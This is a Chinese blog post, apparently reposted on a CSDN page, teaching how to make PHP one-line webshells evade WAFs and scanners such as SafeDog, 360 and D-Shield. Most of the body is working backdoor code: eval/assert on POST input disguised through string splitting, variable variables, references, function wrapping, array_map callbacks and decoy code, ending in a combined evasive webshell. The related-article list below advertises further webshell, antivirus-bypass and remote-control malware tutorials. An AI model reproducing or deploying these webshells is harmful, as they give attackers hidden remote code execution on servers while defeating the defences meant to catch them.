【免杀】————1、PHP一句话过狗、卫士、D盾等免杀思路

最新推荐文章于 2023-11-24 01:25:52 发布
最新推荐文章于 2023-11-24 01:25:52 发布
阅读量1.6k 收藏 13
点赞数 1
分类专栏: 【渗透测试高级篇】 # 免杀

00x1.关键字拆分

比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。
总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法。

00x2.可变变量、引用、可变函数。

可变变量:  比如$a=$_POST[‘x’];$b=’a’;@eval($$b);
测试结果:

总结:这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!
引用:  比如$a=$_POST[‘x’];$b=&$a;@eval($b);

测试结果: 

总结:这种方法与上一种方法类似。
可变函数  比如$a=’a’.’ss’.’e’.’r’.’t’;$a($_POST[‘x’]);
测试结果: 

总结:这种方法对于狗、3卫士、D盾之类的均没有作用哦~

00x3.添加其他代码

添加其他代码  比如  if(empty($a))

{
           $a=$_POST[‘x’];
 }

  @eval($a);

测试结果:

总结:这种方法比较适合脑洞比较大的小伙伴们~

00x4.函数替换。

使用其他函数,比如eval可以使用assert替换。
总结:这种方法适合eval函数被禁用时使用哦~

00x5.封装到新的函数中。

新定义一个函数,使其封装到新函数中。

function test($a){   //定义一个名为test的函数,并使用$a接受参数

               eval($a);

 }

 test($_POST[‘x’]);

测试结果: 

总结:这种方法适合有PHP基础的人哦,姿势风骚~不怕不过!

00x6.函数回调。

使用其他函数进行调用,并执行。
如:array_map(‘a’.’s’.’se’.’r’.’t’,array($_POST[‘x’]));
测试结果: 

总结:这种方法适合有PHP基础的人哦~这种方法绝对过WAF哦~

00x7.利用各种方法的特性写出过WAF的一句话。

 <?php
function test($a){      //利用所学的封装函数
if (empty($a)){       //利用所学的添加其他代码
$a=”echo ‘QQ:xxxxxxx’;”;      //使用这句代码扰乱D盾的判断
}
@eval($a);
}
@test($_POST[‘x’]);
?>

测试结果:

转自:https://www.cnblogs.com/xishaonian/p/6129002.html

FLy_鹏程万里
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于PHP的webshell免杀小结
小王的储物间
02-23 908
我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到免杀的目的!由于在PHP函数中函数名、方法名、类名不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了免杀效果!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
php webshell 免杀入门
Goodric的博客
08-09 1371
免杀则是通过灵活运用编程语言的不同特征以及提供的参数重构木马来躲避查杀工具的查杀。还有通过加解密技术对木马程序进行加解密处理。
PHP一句话木马免杀
小刚的博客
07-26 6289
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 PHP木马免杀小技巧免杀小技巧1.字符串拼接方式,构造敏感函数。2.通过PHP的动态函数方法执行一句话。3.利用php异或^构造字符串免杀木马构造一句话测试异或转码数据 免杀小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 &lt.
暗组免杀php,那些强悍的PHP一句话后门
weixin_33023513的博客
03-09 396
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马PHP1234567891011404 Not FoundNot FoundThe requested URL ...
PHP一句话木马免杀(通过VirusTotal测试)
m0_52233414的博客
01-28 3433
通过拼接,编码,加密等方法对PHP一句话木马进行免杀处理
php一句话木马免杀
qq_58683895的博客
11-21 1599
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
12月最新免杀过5引擎
12-21
"12月最新免杀过5引擎"这个标题暗示了这是一个关于如何让恶意代码绕过主流安全软件的五个引擎检测的教程,可能是针对2018年12月时的最新技术和策略。在网络安全日益严峻的今天,这种技术被不法分子用来规避反病毒...
一壳过360免杀教程
04-11
【描述】"一壳过360免杀教程 远控"意味着这个教程不仅涉及了如何使程序避开360安全卫士的查杀,还包含了远程控制技术的应用。远控,即远程控制,允许攻击者在目标计算机上执行命令、获取信息或者控制系统,通常与...
易语言程序免杀修改器(只过360检测)
02-14
【标题】"易语言程序免杀修改器(只过360检测)" 指的是一种专门用于修改易语言编写的程序,以规避360安全卫士等杀毒软件检测的工具。在IT领域,"免杀"是黑客或恶意软件开发者用来描述绕过反病毒软件检测的技术。这种...
VS2010 免杀域名360个人版远控
01-15
这里的“免杀”指的是绕过安全软件的检测,通常是黑客或恶意软件开发者的目标,以便他们的程序可以在用户的计算机上运行而不被发现。而“360个人版远控”则暗示了这个话题与360安全卫士个人版的防护机制和远程控制...
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3080
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
免杀学习——PHP免杀
ZxC789456302的博客
10-23 1752
php上马免杀,理论上是只要绕过waf就可以,但特殊情况下存在驻场人员手动监控,看到一些奇怪的参就直接给你ban了,所以各位师傅尽量不要在一些敏感时期进行渗透测试,仅用于技术学习推荐大家去看一下这位师傅的文章php免杀合集 - 跳跳糖 (tttang.com),里面还有一些扩展,十分详细。
PHP免杀方法
wutiangui的博客
06-07 848
/ 函数变形 assert 达到免杀(免除杀毒软件识别)的效果:如。//将eval变形为evee。函数从字符串的两端删除空白字符和其他预定义字符。函数把字符串中每个单词的首字符转换为大写。函数把字符串的一部分替换为另一个字符串。函数把字符串中的首字符转换为大写。函数把字符串分割为更小的字符串。函数转换字符串中特定的字符。函数返回字符串的一部分。函数把字符串转换为大写。函数把字符串转换为小写。
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2337
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马的免杀。Webshell检测方式网上有很多免杀一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
PHP一句话木马免杀
墨痕诉清风的博客
10-07 5574
目录 免杀小技巧 1.字符串拼接方式,构造敏感函数。 2.通过PHP的动态函数方法执行一句话。 3.利用php异或^构造字符串 免杀木马构造 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 <?php $a = 'assert'; $b = '_GET'; $a(.
斗狗记之PHP一句话bypass
KEY0NE的个人博客
12-22 203
分享两个过狗PHP一句话吧,并且讲一讲我的过狗思路<?php#木马免杀:从打狗到被狗咬 error_reporting(0); echo"404NotFound."; $building="ps_ot*^7#[emailprotected]@666666666666666666666666666...
免杀原理(php)
最新发布
diaobusi的博客
11-24 467
总结一下思路,首先要定位哪一行代码,会被杀软拦截,接着分析为什么会被拦截,最后根据现有线索去猜测拦截规则,从而绕过杀软拦截。
Python免杀远程控制代码实践与技巧
5. 免杀策略:文章还讨论了如何绕过360等反病毒软件的检测,包括了解不同版本的360安全卫士的特征,并给出了Virustotal(一个病毒扫描服务)的使用方法,以及如何设计bypass策略。 这篇文章深入探讨了Python在编写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值